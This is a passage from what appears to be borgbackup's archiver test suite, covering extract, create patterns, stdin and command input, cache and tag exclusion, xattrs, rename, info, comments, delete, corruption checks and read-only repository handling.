self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
shutil.rmtree("output/input")
# Multiple pattern
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--info', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', self.repository_location + '::test')
self.assert_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
self.assert_in("input/file", output)
def test_extract_progress(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test', '--progress')
assert 'Extracting:' in output
def _create_test_caches(self):
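# cache1: valid CACHEDIR.TAG signature (with trailing extra data), cache2: invalid signature,
# cache3: tag hardlinked to cache1's tag (or a plain copy where hardlinks are unsupported)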
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
contents=b'invalid signature')
os.mkdir('input/cache3')
if are_hardlinks_supported():
os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
else:
self.create_regular_file('cache3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
def test_create_stdin(self):
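# archiving from '-' reads the archive contents from stdin and stores them as a single item
# named 'stdin', owned by uid/gid 0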
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = b'\x00foo\n\nbar\n \n'
self.cmd('create', self.repository_location + '::test', '-', input=input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data)
assert item['path'] == 'stdin'
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
assert extracted_data == input_data
def test_create_content_from_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = 'some test content'
name = 'a/b/c'
self.cmd('create', '--stdin-name', name, '--content-from-command',
self.repository_location + '::test', '--', 'echo', input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data) + 1 # `echo` adds newline
assert item['path'] == name
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test')
assert extracted_data == input_data + '\n'
def test_create_content_from_command_with_failed_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--content-from-command', self.repository_location + '::test',
'--', 'sh', '-c', 'exit 73;', exit_code=2)
assert output.endswith("Command 'sh' exited with status 73\n")
archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
assert archive_list['archives'] == []
def test_create_content_from_command_missing_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--content-from-command', self.repository_location + '::test', exit_code=2)
assert output.endswith('No command given.\n')
def test_create_paths_from_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("dir1/file2", size=1024 * 80)
self.create_regular_file("dir1/file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
input_data = b'input/file1\0input/dir1\0input/file4'
self.cmd('create', '--paths-from-stdin', '--paths-delimiter', '\\0',
self.repository_location + '::test', input=input_data)
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
assert paths == ['input/file1', 'input/dir1', 'input/file4']
def test_create_paths_from_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
input_data = 'input/file1\ninput/file2\ninput/file3'
self.cmd('create', '--paths-from-command',
self.repository_location + '::test', '--', 'echo', input_data)
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
assert paths == ['input/file1', 'input/file2', 'input/file3']
def test_create_paths_from_command_with_failed_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--paths-from-command', self.repository_location + '::test',
'--', 'sh', '-c', 'exit 73;', exit_code=2)
assert output.endswith("Command 'sh' exited with status 73\n")
archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
assert archive_list['archives'] == []
def test_create_paths_from_command_missing_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--paths-from-command', self.repository_location + '::test', exit_code=2)
assert output.endswith('No command given.\n')
def test_create_without_root(self):
"""test create without a root"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
"""test create with only a root pattern"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
def test_create_pattern(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('otherfile', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
"""test when patterns exclude a parent folder, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_in('x input/x/a/foo_a', output)
self.assert_in("A input/x/b/foo_b", output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
"""test when patterns exclude a parent folder and, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n! input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_not_in('input/x/a/foo_a', output)
self.assert_not_in('input/x/a', output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
"""test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', '.')
# list the archive and verify that the "intermediate" folders appear before
# their contents
out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
out_list = out.splitlines()
self.assert_in('d x/a', out_list)
self.assert_in('d x/b', out_list)
assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
def test_create_no_cache_sync(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
'--json', '--error')) # ignore experimental warning
info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
create_stats = create_json['cache']['stats']
info_stats = info_json['cache']['stats']
assert create_stats == info_stats
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
self.cmd('info', self.repository_location)
self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
self._create_test_caches()
self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
self._assert_test_caches()
def test_recreate_exclude_caches(self):
self._create_test_caches()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
self._assert_test_caches()
def _create_test_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('tagged1/.NOBACKUP')
self.create_regular_file('tagged2/00-NOBACKUP')
self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
self.repository_location + '::test')
self._assert_test_tagged()
def _create_test_keep_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file0', size=1024)
self.create_regular_file('tagged1/.NOBACKUP1')
self.create_regular_file('tagged1/file1', size=1024)
self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('tagged2/file2', size=1024)
self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('tagged3/file3', size=1024)
self.create_regular_file('taggedall/.NOBACKUP1')
self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
self.assert_equal(sorted(os.listdir('output/input/taggedall')),
['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
self._assert_test_keep_tagged()
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_hardlinked_tags(self): # test for issue #4911
self.cmd('init', '--encryption=none', self.repository_location)
self.create_regular_file('file1', contents=CACHE_TAG_CONTENTS) # "wrong" filename, but correct tag contents
os.mkdir(os.path.join(self.input_path, 'subdir')) # to make sure the tag is encountered *after* file1
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'subdir', CACHE_TAG_NAME)) # correct tag name, hardlink to file1
self.cmd('create', self.repository_location + '::test', 'input')
# in the "test" archive, we now have, in this order:
# - a regular file item for "file1"
# - a hardlink item for "CACHEDIR.TAG" referring back to file1 for its contents
self.cmd('recreate', '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
# if issue #4911 is present, the recreate will crash with a KeyError for "input/file1"
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
fchown = os.fchown
# We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
# accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
def patched_fchown(fd, uid, gid):
xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
fchown(fd, uid, gid)
# The capability descriptor used here is valid and taken from a /usr/bin/ping
capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'security.capability', capabilities)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
with patch.object(os, 'fchown', patched_fchown):
self.cmd('extract', self.repository_location + '::test')
assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e', 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: xattrs not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: Permission denied\n' in out
assert os.path.isfile(input_abspath)
def test_path_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir1/dir2/file', size=1024 * 80)
with changedir('input/dir1/dir2'):
self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
output = self.cmd('list', self.repository_location + '::test')
self.assert_not_in('..', output)
self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test1')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
with changedir('input'):
self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test3')
self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input')
def test_overwrite(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Overwriting regular files and directories should be supported
os.mkdir('output/input')
os.mkdir('output/input/file1')
os.mkdir('output/input/dir2')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
# But non-empty dirs should fail
os.unlink('output/input/file1')
os.mkdir('output/input/file1')
os.mkdir('output/input/file1/dir')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test', 'test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test.2', 'test.4')
self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
# Make sure both archives have been renamed
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 2)
self.assert_in('test.3', manifest.archives)
self.assert_in('test.4', manifest.archives)
def test_info(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = self.cmd('info', self.repository_location)
assert 'All archives:' in info_repo
info_archive = self.cmd('info', self.repository_location + '::test')
assert 'Archive name: test\n' in info_archive
info_archive = self.cmd('info', '--first', '1', self.repository_location)
assert 'Archive name: test\n' in info_archive
def test_info_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
repository = info_repo['repository']
assert len(repository['id']) == 64
assert 'last_modified' in repository
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert info_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in info_repo['encryption']
cache = info_repo['cache']
stats = cache['stats']
assert all(isinstance(o, int) for o in stats.values())
assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
assert info_repo['repository'] == info_archive['repository']
assert info_repo['cache'] == info_archive['cache']
archives = info_archive['archives']
assert len(archives) == 1
archive = archives[0]
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
assert datetime.strptime(archive['start'], ISO_FORMAT)
assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
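# recreate without --comment (just a path argument) must leave the existing comment untouched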
self.cmd('recreate', self.repository_location + '::test4', '12345')
assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('create', self.repository_location + '::test.3', 'input')
self.cmd('create', self.repository_location + '::another_test.1', 'input')
self.cmd('create', self.repository_location + '::another_test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('delete', '--prefix', 'another_', self.repository_location)
self.cmd('delete', '--last', '1', self.repository_location)
self.cmd('delete', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
self.assert_in('Deleted data:', output)
# Make sure all data except the manifest has been deleted
with Repository(self.repository_path) as repository:
self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('create', self.repository_location + '::test3', 'input')
self.cmd('delete', self.repository_location + '::test1', 'test2')
self.cmd('extract', '--dry-run', self.repository_location + '::test3')
self.cmd('delete', self.repository_location, 'test3')
assert not self.cmd('list', self.repository_location)
def test_delete_repo(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
self.cmd('delete', self.repository_location, exit_code=2)
assert os.path.exists(self.repository_path)
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
self.cmd('delete', self.repository_location)
# Make sure the repo is gone
self.assertFalse(os.path.exists(self.repository_path))
def test_delete_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
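# delete the last content chunk of one file so the archive becomes corrupted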
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
break
else:
assert False # missed the file
repository.commit(compact=False)
output = self.cmd('delete', '--force', self.repository_location + '::test')
self.assert_in('deleted archive was corrupted', output)
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_delete_double_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
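# overwrite the first chunk of the archive's item metadata stream with garbage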
id = archive.metadata.items[0]
repository.put(id, b'corrupted items metadata stream chunk')
repository.commit(compact=False)
self.cmd('delete', '--force', '--force', self.repository_location + '::test')
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_corrupted_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
output = self.cmd('check', '--show-version', self.repository_location)
self.assert_in('borgbackup version', output) # implied output even without --info given
self.assert_not_in('Starting repository check', output) # --info not given for root logger
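# corrupt a few bytes in one of the repository's segment files so the next check must fail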
name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
fd.seek(100)
fd.write(b'XXXX')
output = self.cmd('check', '--info', self.repository_location, exit_code=1)
self.assert_in('Starting repository check', output) # --info given for root logger
def test_readonly_check(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('check', '--verify-data', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('check', '--verify-data', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('check', '--verify-data', self.repository_location, '--bypass-lock')
def test_readonly_diff(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('a')
self.create_src_archive('b')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('diff', '%s::a' % self.repository_location, 'b', exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('diff', '%s::a' % self.repository_location, 'b')
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('diff', '%s::a' % self.repository_location, 'b', '--bypass-lock')
def test_readonly_export_tar(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar')
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', '--bypass-lock')
def test_readonly_extract(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('extract', '%s::test' % self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('extract', '%s::test' % self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('extract', '%s::test' % self.repository_location, '--bypass-lock')
def test_readonly_info(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('info', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('info', self.repository_location, '--bypass-lock')
def test_readonly_list(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('list', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('list', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
